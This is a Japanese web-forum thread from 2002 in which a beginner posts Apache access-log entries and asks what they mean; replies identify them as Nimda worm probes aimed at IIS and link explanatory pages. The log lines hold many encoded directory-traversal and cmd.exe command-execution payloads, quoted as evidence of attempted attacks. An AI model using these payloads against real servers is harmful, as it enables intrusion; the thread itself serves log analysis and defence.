投稿日:2002年12月18日 作成鷹の巣

No.7085 Apacheのaccessログで"GET /scripts/root.exe?/..."について教えてください。



Apacheのaccessログで"GET /scripts/root.exe?/..."について教えてください。

No.7085 投稿時間:2002年12月18日(Wed) 02:33 投稿者名:SPEED URL:

210.3.153.xxx - - [17/Dec/2002:04:15:15 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 401 463
210.3.153.xxx - - [17/Dec/2002:04:15:16 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 401 463
210.3.153.xxx - - [17/Dec/2002:04:15:16 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 463
210.3.153.xxx - - [17/Dec/2002:04:15:16 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 463
210.3.153.xxx - - [17/Dec/2002:04:15:17 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 463
210.3.153.xxx - - [17/Dec/2002:04:15:17 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 463
210.3.153.xxx - - [17/Dec/2002:04:15:17 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 463
210.3.153.xxx - - [17/Dec/2002:04:15:18 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 463
210.3.153.xxx - - [17/Dec/2002:04:15:18 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 463
210.3.153.xxx - - [17/Dec/2002:04:15:18 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
210.3.153.xxx - - [17/Dec/2002:04:15:18 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 463
210.3.153.xxx - - [17/Dec/2002:04:15:19 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 463
210.3.153.xxx - - [17/Dec/2002:04:15:19 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
210.3.153.xxx - - [17/Dec/2002:04:15:19 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
210.3.153.xxx - - [17/Dec/2002:04:15:20 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 463
210.3.153.xxx - - [17/Dec/2002:04:15:20 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 463
210.127.237.xxx - - [17/Dec/2002:04:27:30 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 401 463
210.127.237.xxx - - [17/Dec/2002:04:27:32 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 401 463
210.127.237.xxx - - [17/Dec/2002:04:27:33 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 463
210.127.237.xxx - - [17/Dec/2002:04:27:34 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 463
210.127.237.xxx - - [17/Dec/2002:04:27:35 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 463
210.127.237.xxx - - [17/Dec/2002:04:27:36 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 463
210.127.237.1xxx - - [17/Dec/2002:04:27:36 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 463
210.127.237.xxx - - [17/Dec/2002:04:27:38 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 463
210.127.237.xxx - - [17/Dec/2002:04:27:39 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 463
210.127.237.xxx - - [17/Dec/2002:04:27:40 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
210.127.237.xxx - - [17/Dec/2002:04:27:40 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 463
210.127.237.xxx - - [17/Dec/2002:04:27:41 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 463
210.127.237.xxx - - [17/Dec/2002:04:27:43 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
210.127.237.xxx - - [17/Dec/2002:04:27:43 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
210.127.237.xxx - - [17/Dec/2002:04:27:44 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 463
210.127.237.xxx - - [17/Dec/2002:04:27:46 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 463
61.187.179.xx - - [17/Dec/2002:08:06:45 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 401 463
61.187.179.xx - - [17/Dec/2002:08:06:46 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 401 463
61.187.179.xx - - [17/Dec/2002:08:06:46 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 463
61.187.179.xx - - [17/Dec/2002:08:06:47 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 463
61.187.179.xx - - [17/Dec/2002:08:06:47 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 463
61.187.179.xx - - [17/Dec/2002:08:06:48 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 463
61.187.179.xx - - [17/Dec/2002:08:06:48 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 463
61.187.179.xx - - [17/Dec/2002:08:06:49 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 463
61.187.179.xx - - [17/Dec/2002:08:06:49 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 463
61.187.179.xx - - [17/Dec/2002:08:06:50 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
61.187.179.xx - - [17/Dec/2002:08:06:50 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 463
61.187.179.xx - - [17/Dec/2002:08:06:50 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 463
61.187.179.xx - - [17/Dec/2002:08:06:51 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
61.187.179.xx - - [17/Dec/2002:08:06:51 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
61.187.179.xx - - [17/Dec/2002:08:06:51 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 463
61.187.179.xx - - [17/Dec/2002:08:06:52 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 463


WIN2000PRO・SP-3 Apache 2.0.43 Win32 ユーザー認証使用 BlackICEの設定で80及び21開放 ルーター使用
上記の仕様でWEB及びFTPサーバーを運営しておりますがaccessログで発見しました。
意味がわからない初心者なので教えていただきたく思います。


Nimdaによる攻撃です。

No.7086 投稿時間:2002年12月18日(Wed) 02:42 投稿者名:APACHE URL:

> WIN2000PRO・SP-3 Apache 2.0.43 Win32 ユーザー認証使用 BlackICEの設定で80及び21開放 ルーター使用
> 上記の仕様でWEB及びFTPサーバーを運営しておりますがaccessログで発見しました。
> 意味がわからない初心者なので教えていただきたく思います。
Nimdaによる攻撃です。
IISを対象としているのでAPACHEなら無視してかまいません。


有難うございました。

No.7087 投稿時間:2002年12月18日(Wed) 02:59 投稿者名:SPEED URL:

> > WIN2000PRO・SP-3 Apache 2.0.43 Win32 ユーザー認証使用 BlackICEの設定で80及び21開放 ルーター使用
> > 上記の仕様でWEB及びFTPサーバーを運営しておりますがaccessログで発見しました。
> > 意味がわからない初心者なので教えていただきたく思います。
> Nimdaによる攻撃です。
> IISを対象としているのでAPACHEなら無視してかまいません。

APACHEさん、早速の回答ありがとうございます。
気になっていたのですが安心しました!
本当に有難うございました。


こちらもご一読願います。

No.7093 投稿時間:2002年12月18日(Wed) 10:18 投稿者名:カイナン URL:http://yaguma.com

こんにちはカイナンです。
鷹の巣さんのこちらのページ http://sakaguch.com/HTTPlog.html
私のHPにあるこちらのページ http://yaguma.com/Server/errorlog.html
を参考にして下さい。


Nimda攻撃ログ

No.7110 投稿時間:2002年12月18日(Wed) 20:31 投稿者名:かつ URL:http://www.kkoba.com/

SPEEDさん、APACHEさん、カイナンさんこんばんは。

何回かココには書かせて頂いているので、何度も見た人は御免なさい。
Nimda攻撃の回数と、どの国から攻撃があったかのログです。
カウント方法がややいい加減ですが、参考まで。
http://www.kkoba.com/counter/nimda.shtml


早速、読ませていただきました。

No.7121 投稿時間:2002年12月18日(Wed) 22:36 投稿者名:speed URL:

> SPEEDさん、APACHEさん、カイナンさんこんばんは。
>
> 何回かココには書かせて頂いているので、何度も見た人は御免なさい。
> Nimda攻撃の回数と、どの国から攻撃があったかのログです。
> カウント方法がややいい加減ですが、参考まで。
> http://www.kkoba.com/counter/nimda.shtml

APACHEさん、カイナンさん、かつさん本当にありがとうございました。
カイナンさんのHPで書かれていた件で教えて頂きたい事がありますので
メールさせていただきました。


|目次|掲示板|過去ログ目次|▲頁先頭|